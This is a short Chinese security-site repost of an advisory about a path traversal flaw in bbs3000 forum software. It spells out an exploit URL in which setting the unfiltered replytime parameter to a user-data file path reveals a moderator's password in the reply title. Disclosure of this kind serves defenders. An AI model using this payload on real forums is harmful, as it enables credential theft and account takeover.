| 网站首页 | 新闻中心 | 系统安全 | 网络安全 | 安全技术 | 下载中心 | 
课件制作网.
收藏本站
设为首页
安全365
bbs3000一个不为人知漏洞再提
bbs3000一个不为人知漏洞再提
作者:佚名 文章来源:不详 点击数: 更新时间:2007-1-25 10:41:22
回复帖子的URL为:
http://www.target.com/cgi-bin/bbs/bbs.cgi?
menu=addreply&id=200211122156&replytime=20031206103655"e=1&yjhf=nongdu@sohu.com
replytime这个是表单值,addreply.cgi对表单变量未过滤
将replytime改成../../yhzl/alex.cgi。其中alex为区长
所以地址变成:
http://www.target.com/cgi-bin/bbs/bbs.cgi?

menu=addreply&id=200211122156&replytime=../../yhzl/alex.cgi"e=1&yjhf=nongdu@sohu.
com
这样提交后,在文章标题里会出现 RE:19830930
聪明的就能看出来19830930就是alex这个区长的密码
此漏洞是envymask在3月发现的
到现在这个漏洞知道的不多,而且仍然90%的bbs3000论坛存在漏洞
我再次公布出来是希望大家能引起注意,将网络安全进行到底!

【转自世纪安全网 http://www.21safe.com】
新闻录入:admin    责任编辑:admin 
  • 上一篇新闻:

  • 下一篇新闻:
  • 【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
      网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)
     
     
     
    NetBSD ftpd和tnftpd移植
    IBM WebSphere Host On-
    FreeBSD UFS文件系统本地
    FreeBSD fw_ioctl()整数
    Biba Selenium Web Serv
    Kerio WebStar本地权限提
    OpenBSD ld.so本地环境变
    FreeBSD UFS文件系统本地
    FreeBSD fw_ioctl()整数
    Biba Selenium Web Serv

    Copyright © 2006-2008 www.anquan365.com 安全365
    建议使用1024*768分辨率及第三方浏览器对本站进行浏览